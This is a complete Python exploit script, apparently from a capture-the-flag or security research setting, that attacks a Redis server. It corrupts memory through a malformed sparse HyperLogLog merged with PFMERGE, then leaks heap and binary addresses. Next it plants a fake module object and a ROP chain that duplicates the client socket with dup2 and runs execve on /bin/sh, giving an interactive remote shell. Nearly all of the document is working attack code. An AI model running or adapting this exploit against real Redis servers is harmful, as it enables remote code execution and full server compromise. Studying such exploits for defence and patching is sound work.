#!/usr/bin/env python3

from pwn import *
import redis
import random
import string

# target redis instance
HOST = 'localhost'
PORT = 6379

# local copy of the server binary; its symbols and PLT entries are looked up later
binary = ELF('./redis-server')

# client to send redis commands
r = redis.Redis(host=HOST, port=PORT)

# client to pop shell
# A second, raw connection to the same server. Its fd number, as reported by
# the server in the 'client info' reply, is parsed here and used further down
# as the first argument of the dup2 calls.
p = remote(HOST, PORT)
# pwntools tubes operate on bytes; passing str only works via an ASCII guess
# and emits a BytesWarning, so bytes literals are used explicitly.
p.sendline(b'client info')
p.recvuntil(b'fd=')
# the reply continues with the number followed by whitespace-separated fields
fd = int(p.recvline().split()[0])
log.info(f'{fd = }')

# encoding ids written into the header byte after the magic, and the total
# length used for the dense string below
HLL_DENSE, HLL_SPARSE = 0, 1
HLL_DENSE_SIZE = 0x3010

# make a dense hll, which is just a string with specific encodings:
# magic + encoding byte, zero-padded up to HLL_DENSE_SIZE
pl = (b'HYLL' + p8(HLL_DENSE)).ljust(HLL_DENSE_SIZE, p8(0))
r.set('hll:dense', pl)
# assert that the hll encoding is valid
r.pfadd('hll:dense')

# make a malformed sparse hll, again just a string
def xzero(sz):
  """Encode a run length `sz` (1..0x4000) as a 2-byte opcode.

  The value stored is `sz - 1`: the first byte holds the 0b01 tag in its top
  two bits plus the high six bits, the second byte holds the low eight bits.
  """
  assert 1 <= sz <= 0x4000
  hi, lo = divmod(sz - 1, 0x100)
  return p8(0b01_000000 | hi) + p8(lo)

# Header for the sparse-encoded string: magic, encoding byte, 3 zero bytes,
# then 8 more zero bytes -- 0x10 bytes in total (checked by the assert).
pl = b'HYLL'
pl += p8(HLL_SPARSE) + p8(0)*3
pl += p8(0)*8
assert len(pl) == 0x10
# Opcode stream. The trailing annotations are the original author's running
# offset after each step.
# NOTE(review): presumably this is the position the server computes while
# walking the opcodes -- confirm against the targeted server version.
# The first line alone contributes 0x3fffd * 2 = 0x7fffa bytes.
pl += xzero(0x4000) * 0x3fffd   # -0xc000
pl += xzero(0xc000 - 0x956c)    # -0x956c, where divmod(-0x956c*6, 8) = (-0x7011, 0)
pl += p8(0b1_00011_00)          # runlen = 1, regval = 4 = SDS_TYPE_64 => -0x956b, overwrite sds:b type
pl += xzero(0x156b)             # -0x8000
pl += xzero(0x4000) * 3         # 0x4000
# store the crafted value as a plain string under 'hll:exp'
r.set('hll:exp', pl)

# prep 14KiB sds
# Three string keys are created by writing 8 bytes at a large offset, which
# makes each value 0x37f7 ('sds:a') or 0x37fa ('sds:b', 'sds:c') bytes long.
# fakelen is the length 'sds:b' is expected to report after the merge below
# (see the final assert). The trailing annotations are the original author's
# notes on where each string sits and which bytes surround it.
fakelen = 0x4142434445464748
r.setrange('sds:a', 0x37fa - 11, p64(fakelen))  # sds @ 0x0005, p64() 00 00 00 00
r.setrange('sds:b', 0x37fa - 8, b'B'*8)         # sds @ 0x3805, ................. fa 37 fa 37 02 ~
r.setrange('sds:c', 0x37fa - 8, b'C'*8)         # sds @ 0x7005

# trigger hllMerge + hllSparseToDense
# alloc 0x3010 => round 0x3800 (14KiB)
r.pfmerge('hll:exp', 'hll:dense')                           # sds @ 0xa805

# assert that string type is modified
# (if the reported length is not fakelen the script stops here)
assert r.strlen('sds:b') == fakelen

# spray embstr objects
# Each value is an 8-char random marker followed by the packed key index,
# space-padded to 0x2b bytes; keys are named 'sds:_<index>'.
alphabet = string.ascii_letters + string.digits
marker = ''.join(random.choices(alphabet, k=8)).encode()
log.info(f'{marker = }')
spray_cnt = 0x100000 // 0x40
for batch in range(spray_cnt // 0x400):   # batch spray with mset
  first = batch * 0x400
  r.mset({
    f'sds:_{idx}': (marker+p64(idx)).ljust(0x2b, b' ')
    for idx in range(first, first + 0x400)
  })

# dump the heap!
# Read through 'sds:b'; the first 3 bytes of the reply are dropped, so dump
# offset X corresponds to string offset X + 3.
dump = r.getrange('sds:b', 0, 0x100000)[3:]

# egghunt valid embstr object
# Search for the spray marker from offset 0x3700 onward. For every hit, tofs
# is the offset 0x13 bytes before the marker, and three fields relative to
# tofs are checked. On a mismatch the search resumes 8 bytes further on.
mark = 0x3700
while mark < len(dump):
  mark = dump.find(marker, mark)
  # no further occurrence of the marker: abort
  assert mark != -1
  tofs = mark - 3 - 0x10
  # assert type|encoding, refcount, sdshdr8 fields
  if dump[tofs] == 0x80 and u32(dump[tofs+4:tofs+8]) == 0x1 and dump[tofs+0x10:tofs+0x13] == b'\x2b\x2b\x01':
    break
  mark += 8
else:
  # only reached when the loop condition fails without a break
  assert False, '[!] embstr spray egghunt fail'

# target robj
# tadr: the qword stored at tofs+8 minus 0x13, i.e. moved back by the same
# distance that separates tofs from the marker.
tadr = u64(dump[tofs+8:tofs+0x10]) - 3 - 0x10
# tkey: key name rebuilt from the packed index that follows the 8-byte marker
# (tofs + 3 + 0x18 is the marker offset + 8).
tkey = f'sds:_{u64(dump[tofs+3+0x18:tofs+3+0x20])}'
log.success(f'{tofs = :#x} ({tkey = })')
log.success(f'{tadr = :#014x}')

# sds:b header
# With tadr taken as the address of dump[tofs], dump[0] sits at badr + 8.
badr = tadr - tofs - 8
log.info(f'{badr = :#014x}')

# egghunt redis-server base
# egg: low 12 bits of the symbol's link-time address.
egg = binary.sym['je_ehooks_default_extent_hooks'] & 0xfff
# Visit only the dump offsets i for which badr + 8 + i is a multiple of
# 0x10000. A candidate matches when the qword at i equals 0x200000 and the
# qwords at i+0xc8 and i+0xd8 both end in the egg's low 12 bits.
for i in range(0x10000 - ((badr + 8) & 0xffff), len(dump), 0x10000):
  if u64(dump[i:i+8]) == 0x200000 and (u64(dump[i+0xc8:i+0xd0]) & 0xfff) == egg and (u64(dump[i+0xd8:i+0xe0]) & 0xfff) == egg:
    # rebase the ELF: leaked pointer minus the symbol's link-time address
    binary.address = u64(dump[i+0xc8:i+0xd0]) - binary.sym['je_ehooks_default_extent_hooks']
    break
else:
  assert False, '[!] redis-server base egghunt fail'

# sanity check: the computed base must be 0x1000-aligned
assert (binary.address & 0xfff) == 0
log.success(f'{binary.address = :#014x}')

# fake module object
# Build 16 replacement bytes for the object found at dump offset tofs: a new
# first byte (0x05), the next three bytes copied unchanged from the dump,
# refcount 1, and a pointer to badr + 0x10.
pl = p8(0x05) + dump[tofs+1:tofs+4]   # type, encoding, lru
pl += p32(1)                          # refcount
pl += p64(badr + 0x10)                # ptr
# dump was sliced with [3:], hence string offset tofs + 3
r.setrange('sds:b', tofs+3, pl)

'''
0x001b9991: mov rax, rdi; mov rsi, [rdi+8]; mov rdi, [rdi]; mov rbp, rsp; call qword ptr [rax+0x10];
0x00226097: mov rbp, rdi; mov esi, 0x10; mov edi, 1; call qword ptr [rax+8];
0x001410ec: leave; ret;
0x002d6706: pop rdi; ret;
0x002d5cfb: pop rsi; ret;
0x000fc472: pop rdx; ret;
'''

# fake module value (badr + 0x10)
# The offsets from the listing above are rebased onto the computed image base.
B = binary.address
PRDI = B+0x002d6706
PRSI = B+0x002d5cfb
PRDX = B+0x000fc472

# badr + 0x10
# mv->type is chosen so that (type + 7*8) equals badr + 0x20, which is the
# third qword of this buffer (gadget #0).
# NOTE(review): this assumes the 'free' member sits at offset 7*8 -- confirm.
pl = p64(badr + 0x20 - 7*8)   # mv->type
pl += p64(badr + 0x2010)      # mv->value      (rdi)
pl += p64(B + 0x001b9991)     # mv->type->free (rip), gadget #0
pl = pl.ljust(0x1000, b'\0')

# badr + 0x1010
# path string, followed by a two-entry pointer array: [path, 0]
pl += b'/bin/sh\0'            # 0x1010
pl += p64(badr + 0x1010)      # 0x1018
pl += p64(0)                  # 0x1020
pl = pl.ljust(0x2000, b'\0')

# badr + 0x2010 (=rdi)
# Per the listing: gadget #0 copies rdi to rax and calls [rax+0x10]
# (gadget #1); gadget #1 calls [rax+8] (gadget #2).
pl += p64(badr + 0x2028)      # [rdi], rbp to set
pl += p64(B + 0x001410ec)     # [rax+8], gadget #2
pl += p64(B + 0x00226097)     # [rax+0x10], gadget #1
pl += p64(0)                  # popped rbp

# ret, ROP starts here
# FD_CLOEXEC is dropped on dup2 newfd
pl += p64(PRDI) + p64(fd) + p64(PRSI) + p64(0) + p64(binary.plt['dup2'])
pl += p64(PRDI) + p64(fd) + p64(PRSI) + p64(1) + p64(binary.plt['dup2'])
pl += p64(PRDI) + p64(fd) + p64(PRSI) + p64(2) + p64(binary.plt['dup2'])
pl += p64(PRDI) + p64(badr + 0x1010)
pl += p64(PRSI) + p64(badr + 0x1018)
pl += p64(PRDX) + p64(0)
pl += p64(binary.plt['execve'])

# string offset 3+8 is dump offset 8, i.e. address badr + 0x10
r.setrange('sds:b', 3+8, pl)
# the command client is no longer needed after this write
r.close()
del r

# trigger module free!
# Overwrite the sprayed key found earlier over the raw connection, then hand
# that connection to the terminal. The command is encoded explicitly because
# pwntools tubes operate on bytes; passing str relies on an ASCII guess and
# emits a BytesWarning.
p.sendline(f'set {tkey} 0'.encode())
p.interactive()